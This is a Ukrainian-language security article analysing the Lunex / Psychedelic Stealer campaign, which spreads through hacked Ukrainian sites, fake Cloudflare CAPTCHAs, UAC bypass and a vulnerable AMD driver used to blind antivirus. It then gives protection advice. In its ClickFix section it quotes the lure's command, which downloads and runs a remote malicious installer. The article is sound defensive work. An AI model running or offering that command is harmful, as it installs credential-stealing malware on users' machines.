Як платформа Lunex через зламані українські сайти та вразливий драйвер AMD краде паролі, криптогаманці й отримує віддалений доступ. Розбір і захист.
Вступ
Дослідники з команди Ontinue виявили нову, технічно витончену кампанію, націлену безпосередньо на українськомовних користувачів. Зловмисники зламують цілком легальні українські сайти, вбудовують у них фальшиву перевірку Cloudflare та змушують відвідувачів самостійно запустити шкідливу програму. Кінцева мета — стілер Lunex (також відомий як Psychedelic Stealer), який краде паролі з браузерів, криптогаманці та, що найнебезпечніше, відкриває прихований віддалений доступ до файлів жертви.
Унікальність цієї атаки — у застосуванні техніки Bring Your Own Vulnerable Driver (BYOVD): шкідливий завантажувач використовує вразливий драйвер AMD Radeon Software, щоб «осліпити» антивірус і EDR, не вбиваючи їхні процеси. Розбираємо весь ланцюг атаки, технічні деталі та способи захисту.
Що таке Lunex і Psychedelic Stealer
Lunex — це платформа malware-as-a-service (MaaS): розробники продають або здають в оренду готовий інструментарій для крадіжки даних іншим кіберзлочинцям. Кінцеве шкідливе навантаження, яке доставляється на комп'ютер жертви, дослідники називають Psychedelic Stealer (виконуваний файл psychedeliclove.exe), тоді як Lunex — назва самої платформи та її інфраструктури керування.
Вперше ім'я Lunex з'явилося в літературі з кібербезпеки в червні 2026 року, коли дослідник Люк Вілкінсон з BlueTeamCoolTeam виявив шість активних панелей керування (C2) у США, Фінляндії, Німеччині, Нідерландах та Україні. Пізніше Ontinue нарахувала вже 28 панелей у 13 країнах. Такий ріст — типова ознака комерційної MaaS-платформи, що набирає клієнтів серед різних злочинних груп.
Поточну кампанію першими задокументували фахівці Arctic Wolf Labs (24 вересня 2026 року), назвавши її Psychedelic Stealer, а повний технічний розбір ланцюга атаки опублікував дослідник Rhys Downing з Ontinue (25 вересня 2026 року).
Чому модель MaaS небезпечна? Вона різко знижує поріг входу для злочинців. Кіберзлочинцю більше не потрібно вміти писати шкідливе програмне забезпечення — достатньо орендувати готову панель, купити трафік і запустити кампанію. Саме тому за два-три місяці інфраструктура Lunex розрослася з шести панелей до 28 у 13 країнах: це бізнес, який масштабується, і кожен новий «клієнт» платформи означає нові хвилі атак, зокрема й проти українських користувачів.
Як працює ланцюг атаки: чотири етапи
Атака складається з чотирьох послідовних етапів і починається з, здавалося б, невинної дії користувача.
Етап 1 — зламаний сайт і фальшивий CAPTCHA. Зловмисники зламують легальні сайти малого українського бізнесу і впроваджують у них iframe-елемент з підробленою сторінкою перевірки Cloudflare. Серед скомпрометованих ресурсів — сайти клініки лікування волосся, виробника масштабних моделей, спеціалізованого книжкового магазину, психологічного центру, магазину інструментів та автомобільного рітейлера.
Етап 2 — техніка ClickFix. Фальшива CAPTCHA каже користувачеві «пройти перевірку»: вона копіює в буфер обміну команду вигляду `msiexec.exe /i https://uasputnik.com/elita.msi /passive` і українською мовою інструктує вставити її у вікно «Виконати» (Win+R). Це і є суть техніки ClickFix — жертва сама запускає шкідливий інсталятор, минаючи попередження браузера.
Ефективність ClickFix пояснюється психологією: користувач, який щойно звик до автоматичних перевірок «Я не робот» на реальних сайтах, не бачить нічого підозрілого в аналогічній картинці. А оскільки команда виконується через власне вікно Windows «Виконати», а не через завантаження файлу, антивірус не отримує класичного «шкідливого файлу» на початковому етапі — лише команду msiexec, яка сама по собі є легітимним системним інструментом. Саме тому ця техніка останнім часом стала одним із найпоширеніших векторів доставки шкідливого ПЗ.
Етап 3 — LunexLoader і обхід UAC. MSI-інсталятор (також траплялися файли miks.msi і sova.msi) встановлює завантажувач LunexLoader. Той обходить контроль облікових записів Windows (UAC), зловживаючи COM-об'єктом CMSTPLUA — відомою «безфайловою» технікою підвищення привілеїв, яка не потребує додаткових бінарних файлів.
Етап 4 — осліплення захисту та завантаження стілера. Отримавши підвищені привілеї, LunexLoader виконує BYOVD-атаку, завантажує вразливий драйвер AMD, відключає моніторинг безпеки, а потім завантажує і запускає основний стілер Psychedelic Stealer.
BYOVD-техніка: вразливий драйвер AMD як інструмент осліплення захисту
Найцікавіша частина атаки — Bring Your Own Vulnerable Driver. Зловмисник не шукає вразливість у системі жертви, а приносить її з собою: завантажує легальний, але вразливий драйвер, підписаний виробником.
Lunex використовує драйвер PDFWKRNL.sys — компонент програмного забезпечення AMD Radeon Software, який працює в режимі ядра. Драйвер містить уразливість CVE-2023-20598 (оцінка CVSS 7.8, CWE-269 — неправильне керування привілеями). Вона дозволяє авторизованому виклику надіслати IOCTL-запит і отримати довільне читання та запис у фізичну пам'ять і порти вводу-виводу.
За допомогою цього драйвера зловмисник не вбиває процеси антивірусу чи EDR, а «осліплює» їх, впливаючи на зворотні виклики ядра, що відповідають за моніторинг. Процеси захисту продовжують працювати, але фактично нічого не бачать. Такий підхід дозволяє обійти навіть Microsoft Vulnerable Driver Blocklist і Windows HVCI.
Варто окремо підкреслити, чому це рідкісна і примітна техніка. BYOVD традиційно застосовують у фінальних етапах атак — щоб вимкнути захист перед запуском програми-вимагача чи іншого «важкого» навантаження. Тут же вразливий драйвер використовується як проміжна ланка, що готує ґрунт для звичайного інфостілера. Це свідчить про зростання технічної зрілості операторів стілерів: вони тепер запозичують методи, раніше характерні для більш серйозних, цілеспрямованих угруповань.
Показово, що драйвер PDFWKRNL.sys ще в березні 2026 року внесли до публічного каталогу LOLDrivers, однак наявність у каталозі не завадила шкідливій програмі його завантажити — типове нагадування, що проактивний захист не можна замінювати лише сигнатурами.
Що краде зловмисник: браузери та криптогаманці
Після того як захист осліплений, стілер збирає дані з семи браузерів на базі Chromium: Google Chrome, Microsoft Edge, Brave, Opera, Opera GX і Vivaldi. Він витягує збережені паролі, сесійні cookie-файли та дані автозаповнення.
Окремий фокус — криптовалюта. Lunex націлений на дев'ять гаманців:
- десктопні: Bitcoin Core, Litecoin Core, Exodus, Atomic Wallet, Electrum;
- браузерні розширення: MetaMask, OKX Wallet, SafePal (а також застарілу версію MetaMask Legacy).
Розширення гаманців ідентифікуються за відомими ID, що робить пошук швидким і точним. Для жертви втрата може бути критичною: на відміну від банківської картки, криптовалютні транзакції практично незворотні.
Прихована персистентність: «другі двері» всередині браузера
Lunex не обмежується разовою крадіжкою. Щоб закріпитися в системі, він створює одразу три незалежні механізми персистентності:
- Ключ автозапуску в реєстрі (Registry Run key).
- Приховане заплановане завдання з назвою psychedelicloveUtils, що запускається під час входу в систему.
- Зловмисний Native Messaging Host у Chrome з ідентифікатором com.lunex.explorer.
Третій пункт особливо небезпечний. Native Messaging Host — це легальний механізм, що дозволяє розширенням браузера спілкуватися з програмами на комп'ютері. Lunex реєструє власний хост, який працює на вбудованому PowerShell-скрипті розміром близько 13 200 байтів. Це фактично повноцінний бекдор усередині браузерного процесу: оператор може переглядати диски, читати довільні файли блоками по 512 КБ (до 524 МБ за раз), записувати та завантажувати файли і виконувати код — без встановлення окремого C2-імпланту. Додатково шкідлива програма модифікує налаштування Chrome, щоб надати своєму розширенню широкий доступ до cookie, історії, закладок і вкладок.
Масштаб кампанії: цифри та географія
Arctic Wolf Labs зафіксували хвилю атак у період з 9 по 14 вересня 2026 року: 557 переглядів приманки, 426 кліків по CAPTCHA та 79 успішних встановлень у 32 країнах. Показово, що 446 із 557 переглядів припали саме на Україну — кампанія цілеспрямовано орієнтована на українську аудиторію.
Інфраструктура швидко зростає. Якщо в червні 2026 року було відомо про шість панелей керування, то до кінця вересня Ontinue нарахувала 28 панелей у 13 країнах, включно зі США, Великою Британією, Нідерландами, Францією, Німеччиною, Туреччиною та Бангладеш. Одна з панелей обслуговувала одразу п'ять різних фішингових доменів, що свідчить про розширення платформи за межі простої крадіжки даних — зокрема, в бік фішингу та імітації брендів.
Дослідники Ontinue зазначають ознаки того, що розробники платформи — російськомовні. Домен uasputnik.com, який обслуговував сторінку приманки та роздавав MSI-інсталятор, був зареєстрований спеціально для кампанії.
Як захиститися: практичні поради
Технічна витонченість Lunex не означає, що захиститися неможливо. Ключовий момент — атака починається з соціальної інженерії, а не з вразливості у вашій системі.
1. Ніколи не виконуйте команди з «перевірок» у браузері. Жоден легітимний сайт не попросить вас вставити команду у Win+R або термінал, щоб «підтвердити, що ви людина». Cloudflare та подібні сервіси працюють автоматично і не вимагають від користувача запускати програми.
2. Перевірте, чи ваші дані вже скомпрометовані. Якщо ви підозрюєте, що могли стати жертвою, перевірте свої облікові записи через сервіс перевірки витоків cyberpeople.tech і негайно змініть паролі, починаючи з пошти та банкінгу.
3. Увімкніть двофакторну автентифікацію на всіх важливих акаунтах — пошта, криптобіржі, соцмережі. Навіть якщо пароль вкрадено, MFA значно ускладнить вхід зловмиснику.
4. Тримайте систему оновленою. Хоча ця атака використовує старий драйвер AMD, регулярні оновлення Windows, браузерів і драйверів закривають інші вектори, якими користуються подібні стілери.
5. Використовуйте менеджер паролів і унікальні паролі. Стілери витягують саме збережені у браузері паролі. Окремий менеджер паролів із захищеним сховищем зменшує наслідки крадіжки.
6. Будьте обережні з криптогаманцями-розширеннями. Зберігайте значні суми в апаратних (cold) гаманцях, а не в браузерних розширеннях, які є основною мішенню таких стілерів.
7. Підвищуйте кіберграмотність. Техніки ClickFix і фальшиві CAPTCHA стають дедалі поширенішими. Базові навички розпізнавання фішингу — найдієвіший захист. Корисні матеріали для навчання є на сторінці освіти cyberpeople.tech.
Висновок
Кампанія Lunex — тривожний сигнал для українського сегмента інтернету. Зловмисники цілеспрямовано націлилися на українськомовних користувачів, використовуючи зламані українські сайти, рідну мову в інструкціях і технічно складний ланцюг з використанням вразливого драйвера AMD.
Головний урок простий: навіть найдосконаліша технічна атака починається з одного необережного кліку користувача. Жодна легітимна «перевірка безпеки» не попросить вас виконати команду вручну. Будьте уважні, оновлюйте системи, увімкніть MFA — і регулярно перевіряйте свої дані на предмет витоків.